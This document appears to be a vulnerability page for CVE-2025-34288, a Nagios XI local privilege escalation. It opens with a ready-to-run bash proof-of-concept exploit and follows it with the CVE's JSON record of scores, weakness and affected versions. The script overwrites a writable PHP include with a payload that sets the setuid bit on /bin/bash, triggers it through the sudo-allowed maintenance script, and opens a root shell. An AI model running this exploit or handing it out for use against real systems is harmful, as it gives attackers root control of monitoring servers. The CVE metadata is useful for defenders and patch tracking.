CVE-2025-34288

#!/bin/bash # CVE-2025-34288 PoC - Nagios XI Local Privilege Escalation # This PoC demonstrates the privilege escalation via writable PHP include file TARGET_FILE="/usr/local/nagiosxi/scripts/components/get_components.php" MAINT_SCRIPT="/usr/local/nagiosxi/scripts/nagiosxi/maint" BACKUP_FILE="/tmp/get_components.php.bak" # Step 1: Backup original file echo "[*] Backing up original file..." cp $TARGET_FILE $BACKUP_FILE # Step 2: Inject malicious PHP code echo "[*] Injecting malicious payload..." cat > $TARGET_FILE << 'EOF' <?php // Malicious code injected for CVE-2025-34288 $cmd = 'chmod u+s /bin/bash'; $output = shell_exec($cmd); file_put_contents('/tmp/privesc_executed', 'CVE-2025-34288 exploited at ' . date('Y-m-d H:i:s')); ?> EOF # Step 3: Execute the maintenance script with sudo echo "[*] Executing privileged maintenance script..." sudo $MAINT_SCRIPT # Step 4: Verify exploitation echo "[*] Verifying privilege escalation..." if [ -f /tmp/privesc_executed ]; then echo "[+] Exploitation successful! Root shell available via: bash -p" /bin/bash -p else echo "[-] Exploitation may have failed. Restore backup..." cp $BACKUP_FILE $TARGET_FILE fi # Restore original file cp $BACKUP_FILE $TARGET_FILE rm $BACKUP_FILE

{"cve": {"id": "CVE-2025-34288", "sourceIdentifier": "[email protected]", "published": "2025-12-16T23:15:44.720", "lastModified": "2025-12-24T17:57:41.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2026R1.1 are vulnerable to local privilege escalation due to an unsafe interaction between sudo permissions and application file permissions. A user‑accessible maintenance script may be executed as root via sudo and includes an application file that is writable by a lower‑privileged user. A local attacker with access to the application account can modify this file to introduce malicious code, which is then executed with elevated privileges when the script is run. Successful exploitation results in arbitrary code execution as the root user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndIncluding": "2024", "matchCriteriaId": "1F24B62F-2AE4-4907-B786-6C37F5E967C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2026:r1:*:*:*:*:*:*", "matchCriteriaId": "DBAC321F-6345-4077-A82D-8CC02C21C358"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2026:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "2C36F783-6CD4-4417-B696-DC59388478AF"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/2026r1-1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-writable-php-include-executed-with-sudo", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}